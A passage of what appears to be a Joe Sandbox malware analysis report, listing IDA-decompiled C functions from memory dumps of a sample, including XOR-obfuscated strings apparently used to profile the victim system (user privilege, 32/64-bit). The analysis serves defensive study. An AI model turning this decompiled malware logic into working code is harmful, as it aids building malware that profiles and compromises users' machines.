    				 *((short*)(_t49 + 0x14)) = 0x534;
    				 *((short*)(_t49 + 0x12)) = 0x536;
    				 *((short*)(_t49 + 0x10)) = 0x529;
    				__eflags = 0x535;
    				 *((short*)(_t49 + 0xe)) = 0x535;
    				 *(_t49 + 0x1e) = _t35;
    				do {
    					 *(_t49 + 0xe + _t35 * 2) =  *(_t49 + 0xe + _t35 * 2) ^ 0x00000571;
    					_t35 = _t35 + 1;
    					__eflags = _t35 - 8;
    				} while (_t35 < 8);
    				_push( *((intOrPtr*)(_t48 + 8)));
    				_push(_t49 + 0x12);
    				 *((char*)(_t49 + 0x26)) = 1;
    				return E01348084(_t49 + 0x12, 0x571, _t46);
    			}

    APIs
    • RtlExitUserThread.NTDLL(?,?,?,?,?,?), ref: 012D1AFF
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 100%
    			E012D1F30(void* __eax, void* __edi, intOrPtr _a4, intOrPtr _a8) {
    				void* _t7;
    				char _t9;
    				void* _t10;
    				void* _t11;
    				void* _t15;
    
    				_t10 = __edi;
    				_t11 = __eax - 1;
    				_t9 = 0;
    				_t7 = E012C1AE5(__edi, _t11, _a4, _a8); // executed
    				if(_t7 < 0) {
    					L4:
    					 *((char*)(_t11 + _t10)) = _t9;
    					_t9 = 0x8007007a;
    					L5:
    					return _t9;
    				}
    				_t15 = _t7 - _t11;
    				if(_t15 > 0) {
    					goto L4;
    				}
    				if(_t15 == 0) {
    					 *((char*)(_t11 + __edi)) = 0;
    				}
    				goto L5;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 100%
    			E012C8FD6(intOrPtr _a4, intOrPtr _a8) {
    				void* _t4;
    				long _t6;
    				void* _t7;
    				long _t8;
    				void* _t9;
    				void* _t12;
    				void* _t13;
    
    				_t8 = 0;
    				while(1) {
    					_t4 = E012CB2AC(_a4, _a8, 0); // executed
    					_t7 = _t4;
    					_t9 = _t9 + 0xc;
    					if(_t7 != 0) {
    						break;
    					}
    					_t12 =  *0x12e3b84 - _t4; // 0x0
    					if(_t12 > 0) {
    						Sleep(_t8);
    						_t3 = _t8 + 0x3e8; // 0x3e8
    						_t6 = _t3;
    						_t13 = _t6 -  *0x12e3b84; // 0x0
    						if(_t13 > 0) {
    							_t6 = _t6 | 0xffffffff;
    						}
    						_t8 = _t6;
    						if(_t6 != 0xffffffff) {
    							continue;
    						}
    					}
    					break;
    				}
    				return _t7;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 20%
    			E012CD184() {
    				intOrPtr _v16;
    				void* _t3;
    				void* _t6;
    				void* _t8;
    
    				_push(0);
    				_push(0);
    				_push(1);
    				_push(0);
    				_t3 = E01332812(0, _t6);
    				_push(_v16);
    				_t8 = _t3;
    				_push(_t8);
    				_push(_t3); // executed
    				E013845E0(); // executed
    				return CloseHandle(_t8);
    			}

    APIs
    • CloseHandle.KERNEL32(00000000), ref: 012CD1A0
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000005.00000001.13484397461.0000000001388000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000001.13484384581.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000001.13484628530.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_12c0000_ASC.jbxd

    Non-executed Functions

    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.13484397461.0000000001388000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000001.13484384581.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000001.13484628530.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_12c0000_ASC.jbxd
    C-Code - Quality: 80%
    			E012D41C3(struct HINSTANCE__* __eax, signed short* __edx, void* __edi) {
    				void* __esi;
    				_Unknown_base(*)()* _t493;
    				void* _t499;
    				char* _t501;
    				void* _t502;
    				signed short _t504;
    				short _t505;
    				short _t506;
    				short _t507;
    				short _t508;
    				short _t509;
    				short _t510;
    				short _t511;
    				signed short* _t520;
    				signed short* _t521;
    				signed short _t522;
    				signed short* _t523;
    				signed short* _t524;
    				intOrPtr _t525;
    				void* _t532;
    				intOrPtr* _t535;
    				void* _t538;
    				intOrPtr* _t540;
    				intOrPtr* _t541;
    				signed short* _t545;
    				signed short* _t548;
    				signed short* _t551;
    				signed short* _t554;
    				signed short* _t773;
    				void* _t780;
    				void* _t782;
    				void* _t783;
    				short _t785;
    				short _t786;
    				short _t787;
    				short _t788;
    				short _t789;
    				short _t790;
    				short _t791;
    				short _t794;
    				short _t795;
    				short _t796;
    				short _t797;
    				short _t798;
    				short _t799;
    				short _t800;
    				short _t803;
    				short _t804;
    				short _t805;
    				short _t806;
    				short _t807;
    				short _t808;
    				short _t809;
    				signed int _t821;
    				signed short* _t822;
    				intOrPtr _t823;
    				intOrPtr* _t826;
    				signed int _t828;
    				void* _t830;
    				void* _t831;
    				signed short _t833;
    				signed short _t834;
    				signed int _t838;
    				signed short* _t839;
    				signed int _t849;
    				signed int _t850;
    				void* _t851;
    				void* _t852;
    				signed short _t853;
    				signed short* _t854;
    				void* _t855;
    				signed short* _t856;
    				signed short* _t879;
    				intOrPtr* _t880;
    				intOrPtr _t881;
    				void* _t883;
    				signed short* _t884;
    				signed short* _t886;
    				signed short* _t888;
    				void* _t889;
    
    				_t855 = __edi;
    				_t839 = __edx;
    				_t493 = GetProcAddress(__eax, ??);
    				_push(0);
    				_push(_t889 - 0x478);
    				_t776 = _t889 - 0x480;
    				_push(_t889 - 0x480);
    				_push(_t883);
    				if( *_t493() == 0) {
    					 *(__edi + 0x55c) = 0;
    					 *(__edi + 0x558) = 0;
    				} else {
    					 *(__edi + 0x558) = ( *(_t889 - 0x474) << 0x00000020 |  *(_t889 - 0x478)) >> 0x14;
    					_t838 =  *(_t889 - 0x47c);
    					_t776 = _t838 >> 0x14;
    					 *(__edi + 0x55c) = (_t838 << 0x00000020 |  *(_t889 - 0x480)) >> 0x14;
    				}
    				E012C115B(_t776, _t839, _t883, _t883);
    				_t856 = E012CD461(0, _t855, _t883, 0);
    				_push(_t889 - 0x90);
    				_t884 = _t889 - 0x46c;
    				 *(_t889 - 0x9c) = _t856;
    				 *(_t889 - 0x18) = 0;
    				E012CD1A8();
    				if( *(_t889 - 0x46c) != 0) {
    					 *(_t889 - 0x18) = E012CD461(0, _t856, _t884, 1);
    				}
    				if(_t856 == 0) {
    					_t780 = 0;
    				} else {
    					_t554 = _t856;
    					_t25 =  &(_t554[1]); // 0x2
    					_t839 = _t25;
    					do {
    						_t834 =  *_t554;
    						_t554 =  &(_t554[1]);
    					} while (_t834 != 0);
    					_t780 = (_t554 - _t839 >> 1) + (_t554 - _t839 >> 1);
    				}
    				if( *(_t889 - 0x18) == 0) {
    					_t499 = 0;
    				} else {
    					_t551 =  *(_t889 - 0x18);
    					_t884 =  &(_t551[1]);
    					do {
    						_t839 =  *_t551;
    						_t551 =  &(_t551[1]);
    					} while (_t839 != 0);
    					_t499 = (_t551 - _t884 >> 1) + (_t551 - _t884 >> 1);
    				}
    				_t501 = E012C1195(_t839, _t856, _t884, _t499 + _t780 + 0x960);
    				 *((intOrPtr*)(_t889 - 0x470)) = _t501;
    				_t782 = 0x400;
    				do {
    					 *_t501 = 0;
    					_t501 = _t501 + 1;
    					_t782 = _t782 - 1;
    				} while (_t782 != 0);
    				if(_t856 == 0) {
    					_t783 = 0;
    				} else {
    					_t548 = _t856;
    					_t33 =  &(_t548[1]); // 0x2
    					_t854 = _t33;
    					do {
    						_t833 =  *_t548;
    						_t548 =  &(_t548[1]);
    					} while (_t833 != 0);
    					_t783 = (_t548 - _t854 >> 1) + (_t548 - _t854 >> 1);
    				}
    				if( *(_t889 - 0x18) == 0) {
    					_t502 = 0;
    				} else {
    					_t545 =  *(_t889 - 0x18);
    					_t888 =  &(_t545[1]);
    					do {
    						_t853 =  *_t545;
    						_t545 =  &(_t545[1]);
    					} while (_t853 != 0);
    					_t502 = (_t545 - _t888 >> 1) + (_t545 - _t888 >> 1);
    				}
    				 *((intOrPtr*)(_t889 - 0x464)) = _t502 + _t783 + 0x960;
    				_t504 = 0x20;
    				 *((short*)(_t889 - 0xbc)) = _t504;
    				_t785 = 0x28;
    				 *((short*)(_t889 - 0xba)) = _t785;
    				_t786 = 0x36;
    				 *((short*)(_t889 - 0xb8)) = _t786;
    				_t787 = 0x34;
    				 *((short*)(_t889 - 0xb6)) = _t787;
    				_t788 = 0x62;
    				 *((short*)(_t889 - 0xb4)) = _t788;
    				_t789 = 0x69;
    				 *((short*)(_t889 - 0xb2)) = _t789;
    				_t790 = 0x74;
    				 *((short*)(_t889 - 0xb0)) = _t790;
    				_t791 = 0x29;
    				 *((short*)(_t889 - 0xae)) = _t791;
    				 *((short*)(_t889 - 0xac)) = 0;
    				 *((short*)(_t889 - 0xd0)) = _t504;
    				_t794 = 0x28;
    				 *((short*)(_t889 - 0xce)) = _t794;
    				_t795 = 0x33;
    				 *((short*)(_t889 - 0xcc)) = _t795;
    				_t796 = 0x32;
    				 *((short*)(_t889 - 0xca)) = _t796;
    				_t797 = 0x62;
    				 *((short*)(_t889 - 0xc8)) = _t797;
    				_t798 = 0x69;
    				 *((short*)(_t889 - 0xc6)) = _t798;
    				_t799 = 0x74;
    				 *((short*)(_t889 - 0xc4)) = _t799;
    				_t800 = 0x29;
    				 *((short*)(_t889 - 0xc2)) = _t800;
    				 *((short*)(_t889 - 0xc0)) = 0;
    				 *(_t889 - 0x128) = _t504;
    				_t803 = 0x5b;
    				 *((short*)(_t889 - 0x126)) = _t803;
    				_t804 = 0x47;
    				 *((short*)(_t889 - 0x124)) = _t804;
    				_t805 = 0x55;
    				 *((short*)(_t889 - 0x122)) = _t805;
    				_t806 = 0x45;
    				 *((short*)(_t889 - 0x120)) = _t806;
    				_t807 = 0x53;
    				 *((short*)(_t889 - 0x11e)) = _t807;
    				_t808 = 0x54;
    				 *((short*)(_t889 - 0x11c)) = _t808;
    				_t809 = 0x5d;
    				 *((short*)(_t889 - 0x11a)) = _t809;
    				 *((short*)(_t889 - 0x118)) = 0;
    				 *(_t889 - 0x114) = _t504;
    				_t505 = 0x5b;
    				 *((short*)(_t889 - 0x112)) = _t505;
    				_t506 = 0x41;
    				 *((short*)(_t889 - 0x110)) = _t506;
    				_t507 = 0x44;
    				 *((short*)(_t889 - 0x10e)) = _t507;
    				_t508 = 0x4d;
    				 *((short*)(_t889 - 0x10c)) = _t508;
    				_t509 = 0x49;
    				 *((short*)(_t889 - 0x10a)) = _t509;
    				_t510 = 0x4e;
    				 *((short*)(_t889 - 0x108)) = _t510;
    				_t511 = 0x5d;
    				 *((short*)(_t889 - 0x106)) = _t511;
    				 *((short*)(_t889 - 0x104)) = 0;
    				 *((short*)(_t889 - 0xf2)) = 0xdb;
    				 *((short*)(_t889 - 0xf4)) = 0xdb;
    				 *((short*)(_t889 - 0xf6)) = 0x8c;
    				 *((short*)(_t889 - 0xf8)) = 0x94;
    				 *((short*)(_t889 - 0xfa)) = 0xdb;
    				 *((short*)(_t889 - 0xfc)) = 0x90;
    				 *((short*)(_t889 - 0xfe)) = 0xdb;
    				 *((short*)(_t889 - 0x100)) = 0x8e;
    				 *((short*)(_t889 - 0x258)) = 0xe6;
    				 *((short*)(_t889 - 0x25a)) = 0xdb;
    				 *((short*)(_t889 - 0x25c)) = 0xc3;
    				 *((short*)(_t889 - 0x25e)) = 0xec;
    				 *((short*)(_t889 - 0x260)) = 0xdc;
    				 *((short*)(_t889 - 0x262)) = 0xcf;
    				 *((short*)(_t889 - 0x264)) = 0xd2;
    				 *((short*)(_t889 - 0x266)) = 0xd0;
    				 *((short*)(_t889 - 0x268)) = 0x9e;
    				 *((short*)(_t889 - 0x26a)) = 0xce;
    				 *((short*)(_t889 - 0x26c)) = 0xc6;
    				 *((short*)(_t889 - 0x26e)) = 0x92;
    				 *((char*)(_t889 - 0xf0)) = 0;
    				 *((short*)(_t889 - 0x270)) = 0xdb;
    				 *((short*)(_t889 - 0x272)) = 0x8f;
    				 *((short*)(_t889 - 0x274)) = 0xaa;
    				 *((short*)(_t889 - 0x276)) = 0x88;
    				 *((short*)(_t889 - 0x278)) = 0x89;
    				 *((short*)(_t889 - 0x27a)) = 0x8f;
    				 *((short*)(_t889 - 0x27c)) = 0x92;
    				 *((short*)(_t889 - 0x27e)) = 0x87;
    				 *((short*)(_t889 - 0x280)) = 0x85;
    				 *((short*)(_t889 - 0x282)) = 0x8f;
    				 *((short*)(_t889 - 0x284)) = 0x8a;
    				 *((short*)(_t889 - 0x286)) = 0x96;
    				 *((short*)(_t889 - 0x288)) = 0x96;
    				 *((short*)(_t889 - 0x28a)) = 0xa7;
    				 *((short*)(_t889 - 0x28c)) = 0xec;
    				 *((short*)(_t889 - 0x28e)) = 0xdb;
    				 *((short*)(_t889 - 0x290)) = 0xc3;
    				 *((short*)(_t889 - 0x292)) = 0xec;
    				 *((short*)(_t889 - 0x294)) = 0xdc;
    				 *((short*)(_t889 - 0x296)) = 0xcf;
    				 *((short*)(_t889 - 0x298)) = 0xd0;
    				 *((short*)(_t889 - 0x29a)) = 0xde;
    				 *((short*)(_t889 - 0x29c)) = 0x9e;
    				 *((short*)(_t889 - 0x29e)) = 0xce;
    				 *((short*)(_t889 - 0x2a0)) = 0xc6;
    				 *((short*)(_t889 - 0x2a2)) = 0x92;
    				 *((short*)(_t889 - 0x2a4)) = 0xdb;
    				 *((short*)(_t889 - 0x2a6)) = 0x8f;
    				 *((short*)(_t889 - 0x2a8)) = 0xaa;
    				 *((short*)(_t889 - 0x2aa)) = 0xc6;
    				 *((short*)(_t889 - 0x2ac)) = 0x88;
    				 *((short*)(_t889 - 0x2ae)) = 0x89;
    				 *((short*)(_t889 - 0x2b0)) = 0x8f;
    				 *((short*)(_t889 - 0x2ba)) = 0x8a;
    				 *((short*)(_t889 - 0x2b2)) = 0x92;
    				 *((short*)(_t889 - 0x2be)) = 0x96;
    				 *((short*)(_t889 - 0x2b4)) = 0x87;
    				 *((short*)(_t889 - 0x2c0)) = 0xa7;
    				 *((short*)(_t889 - 0x2c2)) = 0xec;
    				 *((short*)(_t889 - 0x2c4)) = 0xdb;
    				 *((short*)(_t889 - 0x2c6)) = 0xc3;
    				 *((short*)(_t889 - 0x2c8)) = 0xc6;
    				 *((short*)(_t889 - 0x2ca)) = 0xdc;
    				 *((short*)(_t889 - 0x2cc)) = 0xa2;
    				 *((short*)(_t889 - 0x2bc)) = 0x96;
    				 *((short*)(_t889 - 0x2ce)) = 0xaf;
    				 *((intOrPtr*)(_t889 - 0x2b8)) = 0x85008f;
    				 *((short*)(_t889 - 0x2d0)) = 0xb5;
    				 *((short*)(_t889 - 0x2d2)) = 0xec;
    				 *((short*)(_t889 - 0x2d4)) = 0xdb;
    				 *((short*)(_t889 - 0x2d6)) = 0xc3;
    				 *((short*)(_t889 - 0x2d8)) = 0xdb;
    				 *((short*)(_t889 - 0x2da)) = 0xc3;
    				 *((short*)(_t889 - 0x2dc)) = 0xdb;
    				 *((short*)(_t889 - 0x2de)) = 0xc3;
    				 *((short*)(_t889 - 0x2e0)) = 0xdb;
    				 *((short*)(_t889 - 0x2e2)) = 0xc3;
    				 *((short*)(_t889 - 0x2e4)) = 0xdb;
    				 *((short*)(_t889 - 0x2e6)) = 0xc3;
    				 *((short*)(_t889 - 0x2e8)) = 0xc6;
    				 *((short*)(_t889 - 0x2ea)) = 0xdc;
    				 *((short*)(_t889 - 0x2ec)) = 0x89;
    				 *((short*)(_t889 - 0x2f4)) = 0xc6;
    				 *((short*)(_t889 - 0x2ee)) = 0x80;
    				 *((short*)(_t889 - 0x2f6)) = 0x94;
    				 *((short*)(_t889 - 0x2f8)) = 0x83;
    				 *((short*)(_t889 - 0x2fa)) = 0xdb;
    				 *((short*)(_t889 - 0x2fc)) = 0xb3;
    				 *((short*)(_t889 - 0x2fe)) = 0xec;
    				 *((short*)(_t889 - 0x300)) = 0xec;
    				 *((short*)(_t889 - 0x302)) = 0xcf;
    				 *((short*)(_t889 - 0x304)) = 0xdb;
    				 *((short*)(_t889 - 0x306)) = 0xc3;
    				 *((short*)(_t889 - 0x308)) = 0xce;
    				 *((short*)(_t889 - 0x30a)) = 0xc6;
    				 *((short*)(_t889 - 0x30c)) = 0xdb;
    				 *((short*)(_t889 - 0x30e)) = 0xc3;
    				 *((short*)(_t889 - 0x310)) = 0xb9;
    				 *((short*)(_t889 - 0x312)) = 0xdb;
    				 *((short*)(_t889 - 0x314)) = 0xc3;
    				 *((short*)(_t889 - 0x316)) = 0xc6;
    				 *((short*)(_t889 - 0x318)) = 0xdc;
    				 *((short*)(_t889 - 0x31a)) = 0x83;
    				 *((short*)(_t889 - 0x31c)) = 0x8a;
    				 *((short*)(_t889 - 0x31e)) = 0x87;
    				 *((short*)(_t889 - 0x320)) = 0x85;
    				 *((short*)(_t889 - 0x322)) = 0x89;
    				 *((intOrPtr*)(_t889 - 0x2f2)) = 0x8800af;
    				 *((short*)(_t889 - 0x324)) = 0xaa;
    				 *((short*)(_t889 - 0x326)) = 0xec;
    				 *((short*)(_t889 - 0x328)) = 0x9b;
    				 *((short*)(_t889 - 0x32a)) = 0xdb;
    				 *((short*)(_t889 - 0x32c)) = 0xc3;
    				 *((short*)(_t889 - 0x32e)) = 0x9d;
    				 *((short*)(_t889 - 0x330)) = 0xc6;
    				 *((short*)(_t889 - 0x332)) = 0xdb;
    				 *((short*)(_t889 - 0x334)) = 0xc3;
    				 *((short*)(_t889 - 0x336)) = 0xdb;
    				 *((short*)(_t889 - 0x338)) = 0xc3;
    				 *((short*)(_t889 - 0x33a)) = 0xdb;
    				 *((short*)(_t889 - 0x33c)) = 0xc3;
    				 *((short*)(_t889 - 0x33e)) = 0xdb;
    				 *((short*)(_t889 - 0x340)) = 0xc3;
    				 *((short*)(_t889 - 0x342)) = 0xc6;
    				 *((short*)(_t889 - 0x344)) = 0xdc;
    				 *((short*)(_t889 - 0x346)) = 0x89;
    				 *((short*)(_t889 - 0x348)) = 0x92;
    				 *((short*)(_t889 - 0x34a)) = 0xc6;
    				 *((short*)(_t889 - 0x34c)) = 0x82;
    				 *((short*)(_t889 - 0x34e)) = 0x83;
    				 *((short*)(_t889 - 0x350)) = 0x94;
    				 *((short*)(_t889 - 0x352)) = 0x83;
    				 *((short*)(_t889 - 0x354)) = 0x92;
    				 *((short*)(_t889 - 0x356)) = 0xdb;
    				 *((short*)(_t889 - 0x358)) = 0x8f;
    				 *((short*)(_t889 - 0x35a)) = 0x81;
    				 *((short*)(_t889 - 0x35c)) = 0x83;
    				 *((short*)(_t889 - 0x35e)) = 0xb4;
    				 *((short*)(_t889 - 0x360)) = 0xec;
    				 *((short*)(_t889 - 0x362)) = 0xdb;
    				 *((short*)(_t889 - 0x364)) = 0xc3;
    				 *((short*)(_t889 - 0x366)) = 0xdb;
    				 *((short*)(_t889 - 0x368)) = 0xc3;
    				 *((short*)(_t889 - 0x36a)) = 0xdb;
    				 *((short*)(_t889 - 0x36c)) = 0xc3;
    				 *((short*)(_t889 - 0x36e)) = 0xdb;
    				 *((short*)(_t889 - 0x370)) = 0xc3;
    				 *((short*)(_t889 - 0x372)) = 0xdb;
    				 *((short*)(_t889 - 0x374)) = 0xc3;
    				 *((short*)(_t889 - 0x376)) = 0xc6;
    				 *((short*)(_t889 - 0x378)) = 0xdc;
    				 *((short*)(_t889 - 0x37a)) = 0x88;
    				 *((short*)(_t889 - 0x37c)) = 0x89;
    				 *((short*)(_t889 - 0x37e)) = 0x8f;
    				 *((short*)(_t889 - 0x380)) = 0xdb;
    				 *((short*)(_t889 - 0x382)) = 0x94;
    				 *((short*)(_t889 - 0x384)) = 0x83;
    				 *((short*)(_t889 - 0x386)) = 0xb0;
    				 *((short*)(_t889 - 0x388)) = 0xc6;
    				 *((short*)(_t889 - 0x38a)) = 0xdb;
    				 *((short*)(_t889 - 0x38c)) = 0x91;
    				 *((short*)(_t889 - 0x38e)) = 0x89;
    				 *((short*)(_t889 - 0x390)) = 0x82;
    				 *((short*)(_t889 - 0x392)) = 0x88;
    				 *((short*)(_t889 - 0x394)) = 0x8f;
    				 *((short*)(_t889 - 0x396)) = 0xb1;
    				 *((short*)(_t889 - 0x398)) = 0xec;
    				 *((short*)(_t889 - 0x39a)) = 0xec;
    				 *((short*)(_t889 - 0x39c)) = 0x8a;
    				 *((short*)(_t889 - 0x39e)) = 0x87;
    				 *((short*)(_t889 - 0x3a0)) = 0x92;
    				 *((short*)(_t889 - 0x3a2)) = 0x89;
    				 *((short*)(_t889 - 0x3a4)) = 0x92;
    				 *((short*)(_t889 - 0x3a6)) = 0xc6;
    				 *((short*)(_t889 - 0x3a8)) = 0xa4;
    				 *((short*)(_t889 - 0x3aa)) = 0xab;
    				 *((short*)(_t889 - 0x3ac)) = 0x82;
    				 *((short*)(_t889 - 0x3ae)) = 0xc3;
    				 *((short*)(_t889 - 0x3b0)) = 0xc6;
    				 *((short*)(_t889 - 0x3b2)) = 0xc9;
    				 *((short*)(_t889 - 0x3b4)) = 0xc6;
    				 *((short*)(_t889 - 0x3b6)) = 0x83;
    				 *((short*)(_t889 - 0x3b8)) = 0x83;
    				 *((short*)(_t889 - 0x3ba)) = 0x94;
    				 *((short*)(_t889 - 0x3bc)) = 0x80;
    				 *((short*)(_t889 - 0x3be)) = 0xc6;
    				 *((short*)(_t889 - 0x3c0)) = 0xa4;
    				 *((short*)(_t889 - 0x3c2)) = 0xab;
    				 *((short*)(_t889 - 0x3c4)) = 0x82;
    				 *((short*)(_t889 - 0x3c6)) = 0xc3;
    				 *((short*)(_t889 - 0x3c8)) = 0xc6;
    				 *((short*)(_t889 - 0x3ca)) = 0xdc;
    				 *((short*)(_t889 - 0x3cc)) = 0x8d;
    				 *((short*)(_t889 - 0x3ce)) = 0xdb;
    				 *((short*)(_t889 - 0x3d0)) = 0x8f;
    				 *((short*)(_t889 - 0x3d2)) = 0xa2;
    				 *((short*)(_t889 - 0x3d4)) = 0xc6;
    				 *((short*)(_t889 - 0x3d6)) = 0x82;
    				 *((short*)(_t889 - 0x3d8)) = 0x94;
    				 *((short*)(_t889 - 0x3da)) = 0x87;
    				 *((short*)(_t889 - 0x3dc)) = 0xae;
    				 *((short*)(_t889 - 0x3de)) = 0xec;
    				 *((short*)(_t889 - 0x3e0)) = 0xcf;
    				 *((short*)(_t889 - 0x3e2)) = 0x82;
    				 *((short*)(_t889 - 0x3e4)) = 0x83;
    				 *((short*)(_t889 - 0x3e6)) = 0xdb;
    				 *((short*)(_t889 - 0x3e8)) = 0x93;
    				 *((short*)(_t889 - 0x3ea)) = 0xc6;
    				 *((short*)(_t889 - 0x3ec)) = 0xc3;
    				 *((short*)(_t889 - 0x3ee)) = 0xc3;
    				 *((short*)(_t889 - 0x3f0)) = 0x93;
    				 *((short*)(_t889 - 0x3f2)) = 0xc3;
    				 *((short*)(_t889 - 0x3f4)) = 0xce;
    				 *((short*)(_t889 - 0x3f6)) = 0xc6;
    				 *((short*)(_t889 - 0x3f8)) = 0x8a;
    				 *((short*)(_t889 - 0x3fa)) = 0x87;
    				 *((short*)(_t889 - 0x3fc)) = 0x92;
    				 *((short*)(_t889 - 0x3fe)) = 0x89;
    				 *((short*)(_t889 - 0x400)) = 0x92;
    				 *((short*)(_t889 - 0x402)) = 0xc6;
    				 *((short*)(_t889 - 0x404)) = 0xa4;
    				 *((short*)(_t889 - 0x406)) = 0xab;
    				 *((short*)(_t889 - 0x408)) = 0x82;
    				 *((short*)(_t889 - 0x40a)) = 0xc3;
    				 *((short*)(_t889 - 0x40c)) = 0xc6;
    				 *((short*)(_t889 - 0x40e)) = 0x83;
    				 *((short*)(_t889 - 0x410)) = 0x83;
    				 *((short*)(_t889 - 0x412)) = 0x94;
    				 *((short*)(_t889 - 0x414)) = 0x80;
    				 *((short*)(_t889 - 0x416)) = 0xc6;
    				 *((short*)(_t889 - 0x418)) = 0xa4;
    				 *((short*)(_t889 - 0x41a)) = 0xab;
    				 *((short*)(_t889 - 0x41c)) = 0x82;
    				 *((short*)(_t889 - 0x41e)) = 0xc3;
    				 *((short*)(_t889 - 0x420)) = 0xc6;
    				 *((short*)(_t889 - 0x422)) = 0xdc;
    				 *((short*)(_t889 - 0x424)) = 0xab;
    				 *((short*)(_t889 - 0x426)) = 0xa7;
    				 *((short*)(_t889 - 0x428)) = 0xb4;
    				 *((short*)(_t889 - 0x42a)) = 0xec;
    				 *((short*)(_t889 - 0x42c)) = 0x95;
    				 *((short*)(_t889 - 0x42e)) = 0xc3;
    				 *((short*)(_t889 - 0x430)) = 0xc6;
    				 *((short*)(_t889 - 0x432)) = 0xdc;
    				 *((short*)(_t889 - 0x434)) = 0x83;
    				 *((short*)(_t889 - 0x44e)) = 0x95;
    				 *((short*)(_t889 - 0x436)) = 0x94;
    				 *((short*)(_t889 - 0x450)) = 0xc3;
    				 *((short*)(_t889 - 0x438)) = 0x93;
    				 *((short*)(_t889 - 0x440)) = 0x92;
    				 *((short*)(_t889 - 0x452)) = 0xc6;
    				 *((short*)(_t889 - 0x442)) = 0x8f;
    				 *((short*)(_t889 - 0x45c)) = 0xb3;
    				 *((short*)(_t889 - 0x444)) = 0x8e;
    				 *((short*)(_t889 - 0x45e)) = 0xb6;
    				 *((short*)(_t889 - 0x446)) = 0x85;
    				 *((short*)(_t889 - 0x460)) = 0xa5;
    				_t520 =  *(_t889 - 0x18);
    				 *((short*)(_t889 - 0x448)) = 0x94;
    				 *((short*)(_t889 - 0x43a)) = 0x92;
    				 *((intOrPtr*)(_t889 - 0x43e)) = 0x850083;
    				 *((intOrPtr*)(_t889 - 0x44c)) = 0xa700ec;
    				 *((intOrPtr*)(_t889 - 0x456)) = 0x8200c3;
    				 *((intOrPtr*)(_t889 - 0x45a)) = 0xc600dc;
    				 *((char*)(_t889 - 0x256)) = 0;
    				_t879 = 0x12e06d0;
    				 *(_t889 - 0xa4) = _t520;
    				if(_t520 == 0) {
    					 *(_t889 - 0xa4) = 0x12e06d0;
    				}
    				_t521 =  *(_t889 - 0x9c);
    				 *(_t889 - 0xa8) = _t521;
    				if(_t521 == 0) {
    					 *(_t889 - 0xa8) = _t879;
    				}
    				_t886 =  *(_t889 - 4);
    				_t522 = _t886[0x288];
    				if(_t522 == 0) {
    					_t523 = _t889 - 0x128;
    					goto L36;
    				} else {
    					if(_t522 != 1) {
    						_t523 = _t889 - 0x114;
    						L36:
    						 *(_t889 - 4) = _t523;
    					} else {
    						 *(_t889 - 4) = _t879;
    					}
    				}
    				_t524 =  &(_t886[0x208]);
    				_t821 =  *_t524 & 0x0000ffff;
    				 *(_t889 - 0xa0) = 0x12e06d4;
    				if(_t821 != 0) {
    					 *(_t889 - 0x94) = _t524;
    				} else {
    					 *(_t889 - 0xa0) = _t879;
